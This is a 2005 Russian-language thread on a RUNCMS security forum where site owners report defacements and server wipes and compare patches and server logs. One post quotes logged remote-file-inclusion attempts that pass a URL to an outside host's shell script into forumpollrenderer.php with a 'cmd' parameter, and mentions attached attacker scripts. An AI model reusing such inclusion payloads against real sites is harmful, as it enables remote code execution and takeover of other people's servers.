Сайт сообщества | Клуб пользователей | О проекте

Имя
Пароль
ПравилаРегистрацияСправка
Сообщения за деньПоиск

Вернуться   Клуб пользователей портальной системы RUNCMS > Портал > Безопасность

Ответ
 
Опции темы Опции просмотра
DimonVideo вне форума DimonVideo
Младший участник


| Цитировать Старый #71 10-18-2005, 21:08

Цитата:
Сообщение от LARK
Это уже после взлома?
нет, они сначала пару раз его в обменник грузили, хотя запрет на php стоял , а потом как т отуда умудрились и через него все стерли на серваке

Посетить домашнюю страницу DimonVideo
  Сообщения: 66 c 05.02.2005 | Репутация: 4
Zormax вне форума Zormax
Старожил

Аватар для Zormax

| Цитировать Старый #72 10-20-2005, 09:09

Несколько дней подряд нахожу в логах такого рода ошибки (привожу выборочно сегодняшние):

***forumpollrenderer.php?bbPath[path]=http://lol.freecoolsite.com/veg.txt?&cmd=id

***forumpollrenderer.php?bbPath[path]=http://darkboyz.mvhosted.com/cmd.txt?&cmd=help

* - это поскипано.

Кстати, айпишник всегда один и тот же...

Прикрепляю даже файлы этих скриптов...
Вложения
Тип файла: zip zzz.zip (6.5 Кбайт, 9 просмотров)


Всё для Sony Ericsson
Посетить домашнюю страницу Zormax
  Сообщения: 2,424 c 15.05.2004 | Репутация: 149
LARK вне форума LARK
[исход]

Аватар для LARK

| Цитировать Старый #73 10-20-2005, 13:08

Цитата:
Несколько дней подряд нахожу в логах такого рода ошибки (привожу выборочно сегодняшние):
А, это как раз пытаются закачать эксплоит через дырку в форуме о которой говорили. Ни у понятно получить Shell доступ


Правила нашего Форума :: О клубе пользователей RUNCMS :: Рекомендации по публикации сообщений :: Прежде чем задать вопрос воспользуйтесь Поиском
-------------------------------------------------------------------
Если что-то не работает, задавая вопрос, ! ОБЯЗАТЕЛЬНО ! пишите версию RUNCMS/модуля/PHP/MySQL и текст самой ошибки.
Посетить домашнюю страницу LARK
  Сообщения: 4,185 c 20.09.2003 | Репутация: 223
Zormax вне форума Zormax
Старожил

Аватар для Zormax

| Цитировать Старый #74 10-21-2005, 07:53

Это все понятно, вот и сиди и трясись...


Всё для Sony Ericsson
Посетить домашнюю страницу Zormax
  Сообщения: 2,424 c 15.05.2004 | Репутация: 149
lutsiger вне форума lutsiger
Нерешительный


| Цитировать Старый #75 10-24-2005, 03:46

Мой сайт ломали вчера и поставили index.html свой . Установил заплатку на форум, только что опять ломали и обломались!!!!

  Сообщения: 1 c 26.04.2005 | Репутация: 1
clog вне форума clog
Зам старшего участника

Аватар для clog

| Цитировать Старый #76 10-24-2005, 09:06

Меня вчера тоже ломали. Помоему через загрузку аватров.

Каким то образом исчезли аватры у польщователей не которых, но на серваке они есть.

  Сообщения: 470 c 01.10.2004 | Репутация: 3
Jurist вне форума Jurist
Жизнь хороша!

Аватар для Jurist

| Цитировать Старый #77 11-23-2005, 15:26

Были ломатели и у меня... час назад. Подмена главной, хотя заплатки стоят и для форума и для аватаров... Заменили главную на index.html, заменили пароль доступа к с-панели на хостинге, пароль к БД и админ-почте, соответственно для админского ftp сменился... Хорошо что быстро обнаружил, тут же позвонил хостеру, главную-html убрали... сменили пароли, сайт пока снова работает... вот только не успел сохранить адреса и инфу, которую эти гады оставляли на главной...

Вопрос: если установлены патчи на форум + патч для загрузки файлов - каким еще способом могли зайти и получить доступ? Логи доступа щас скачаю конечно ид с-панели, но пока докопаюсь что где и как....


Белорусский правовой независимый информационно-аналитический портал
-----
"Помогать людям в беде - наш профессиональный долг. Помогать им зарабатывать деньги - наш бизнес."(c) Jurist
Посетить домашнюю страницу Jurist
  Сообщения: 648 c 06.02.2005 | Репутация: 24
Zormax вне форума Zormax
Старожил

Аватар для Zormax

| Цитировать Старый #78 11-23-2005, 18:48

Jurist Модуль upload это переделанный mydownloads???
Может через него или через mylinks...

Посмотри в файлах visit, singlefile, modfile, ratefile, brokenfile есть такие строки:

$lid = intval($HTTP_GET_VARS['lid']);
$cid = intval($HTTP_POST_VARS["cid"]);

Что-то подобное есть?


Всё для Sony Ericsson
Посетить домашнюю страницу Zormax
  Сообщения: 2,424 c 15.05.2004 | Репутация: 149
Jurist вне форума Jurist
Жизнь хороша!

Аватар для Jurist

| Цитировать Старый #79 11-23-2005, 22:40

Второй строки нет, первая прослеживается в файлах brokenfile (строка 43) и modfile (срока 96) модуля upload. Да, он сделан на основе mydownloads, брал модуль из обменника на форуме.. И что это за строки?


Белорусский правовой независимый информационно-аналитический портал
-----
"Помогать людям в беде - наш профессиональный долг. Помогать им зарабатывать деньги - наш бизнес."(c) Jurist
Посетить домашнюю страницу Jurist
  Сообщения: 648 c 06.02.2005 | Репутация: 24
Jurist вне форума Jurist
Жизнь хороша!

Аватар для Jurist

| Цитировать Старый #80 11-23-2005, 22:50

И еще... в логе сервера за сегодня первые упоминания о файле index.html "звучат" в строках:

213.255.202.62 - - [23/Nov/2005:13:27:10 +0200] "GET /index.html HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.23 [ru]"
213.255.202.62 - - [23/Nov/2005:13:27:19 +0200] "GET /index.htm HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.23 [ru]"

Если что-то еще можно накопать в этом логе с сервака (raw-log) то он у меня есть, хостер сделал вырезку с 00 часов где-то по 15:15 дня... Факт вставки первой страницы был обнаружен как раз около часа дня... хотя... чуть раньше, где-то в полдвенадцатого заметил, что не снимается админ-почта, выдает ошибку пароля.


Белорусский правовой независимый информационно-аналитический портал
-----
"Помогать людям в беде - наш профессиональный долг. Помогать им зарабатывать деньги - наш бизнес."(c) Jurist
Посетить домашнюю страницу Jurist
  Сообщения: 648 c 06.02.2005 | Репутация: 24
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход


Рейтинг@Mail.ru Хостинг провайдер Majordomo. Powered by: vBulletin Version 3.0
Copyright ©2000-2024, Jelsoft Enterprises Ltd.
Все разделы прочитаны - Руководство форума - Архив - Вверх
Rambler's Top100
Output: 87.82 Kb. compressed to 80.42 Kb. by saving 7.40 Kb. (8.43%)
Page generated in 0.09177 seconds with 11 queries